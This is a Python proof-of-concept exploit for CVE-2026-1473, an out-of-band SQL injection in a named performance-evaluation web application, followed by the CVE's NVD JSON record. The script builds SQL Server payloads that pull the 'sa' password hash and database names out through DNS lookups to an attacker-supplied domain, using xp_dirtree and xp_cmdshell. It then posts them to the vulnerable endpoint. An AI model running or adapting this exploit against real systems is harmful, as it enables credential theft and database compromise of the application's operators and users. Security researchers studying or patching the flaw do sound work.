CVE-2026-1473

#!/usr/bin/env python3 """ CVE-2026-1473 - Out-of-Band SQL Injection PoC Target: Performance Evaluation (EDD) by Gabinete Técnico de Programación Endpoint: /evaluacion_competencias_evalua.aspx Vulnerable Parameter: Id_usuario """ import requests import base64 import argparse def build_oob_payload(target_domain): """Build OOB SQLi payload for DNS exfiltration on SQL Server""" # Payload to extract database user via DNS request # Using xp_dirtree to trigger DNS lookup payload = f"'; DECLARE @host VARCHAR(8000); SET @host = (SELECT TOP 1 master.dbo.fn_varbintohexstr(password_hash) FROM sys.sql_logins WHERE name='sa') + '.{target_domain}'; EXEC('master..xp_dirtree ''\\\\' + @host + '\\c$'''); --" return payload def build_dns_exfil_payload(target_domain, query): """Build DNS exfiltration payload for SQL Server""" # Encode query result and send via DNS encoded_query = base64.b64encode(query.encode()).decode() payload = f"'; DECLARE @data VARCHAR(8000); SELECT @data = (SELECT TOP 1 name FROM sys.databases); EXEC('exec master..xp_cmdshell "ping ' + @data + '.' + '{target_domain}' + '"'); --" return payload def exploit_sql_injection(target_url, vulnerable_param, payload, proxy=None): """ Send malicious payload to vulnerable endpoint """ proxies = {'http': proxy, 'https': proxy} if proxy else None # Target endpoint endpoint = f"{target_url}/evaluacion_competencias_evalua.aspx" # POST data with malicious Id_usuario parameter data = { vulnerable_param: payload, '__VIEWSTATE': 'dummy', '__EVENTVALIDATION': 'dummy' } headers = { 'Content-Type': 'application/x-www-form-urlencoded', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)' } try: response = requests.post(endpoint, data=data, headers=headers, proxies=proxies, timeout=30, verify=False) return response.status_code, response.text[:500] except requests.exceptions.RequestException as e: return None, str(e) def main(): parser = argparse.ArgumentParser(description='CVE-2026-1473 OOB SQLi PoC') parser.add_argument('--url', required=True, help='Target base URL') parser.add_argument('--attacker-domain', required=True, help='Attacker-controlled domain for DNS exfiltration') parser.add_argument('--param', default='Id_usuario', help='Vulnerable parameter name') parser.add_argument('--proxy', help='HTTP proxy for debugging') args = parser.parse_args() print(f"[*] CVE-2026-1473 OOB SQL Injection PoC") print(f"[*] Target: {args.url}") print(f"[*] Attacker Domain: {args.attacker_domain}") # Build payload payload = build_oob_payload(args.attacker_domain) print(f"[*] Generated Payload: {payload[:100]}...") # Send exploit print(f"[*] Sending exploit request...") status, response = exploit_sql_injection(args.url, args.param, payload, args.proxy) if status: print(f"[+] Request sent. Status: {status}") print(f"[*] Check DNS logs on {args.attacker_domain} for exfiltrated data") else: print(f"[-] Request failed: {response}") if __name__ == '__main__': main()

{"cve": {"id": "CVE-2026-1473", "sourceIdentifier": "[email protected]", "published": "2026-01-27T17:16:10.547", "lastModified": "2026-02-10T20:20:56.477", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An out-of-band SQL injection vulnerability (OOB SQLi) has been detected in the Performance Evaluation (EDD) application developed by Gabinete Técnico de Programación. Exploiting this vulnerability in the parameter 'Id_usuario’ in '/evaluacion_competencias_evalua.aspx', could allow an attacker to extract sensitive information from the database through external channels, without the affected application returning the data directly, compromising the confidentiality of the stored information."}, {"lang": "es", "value": "Una vulnerabilidad de inyección SQL fuera de banda (OOB SQLi) ha sido detectada en la aplicación de Evaluación del Desempeño (EDD) desarrollada por Gabinete Técnico de Programación. La explotación de esta vulnerabilidad en el parámetro 'Id_usuario' en '/evaluacion_competencias_evalua.aspx' podría permitir a un atacante extraer información sensible de la base de datos a través de canales externos, sin que la aplicación afectada devuelva los datos directamente, comprometiendo la confidencialidad de la información almacenada."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:quatuor:evaluacion_de_desempeno:-:*:*:*:*:*:*:*", "matchCriteriaId": "66ECBB1A-4822-4186-9C8B-49740C8B52A4"}]}]}], "references": [{"url": "https://www.incibe.es/en/incibe-cert/notices/aviso/out-band-sql-injection-quatuor-performance-evaluation", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}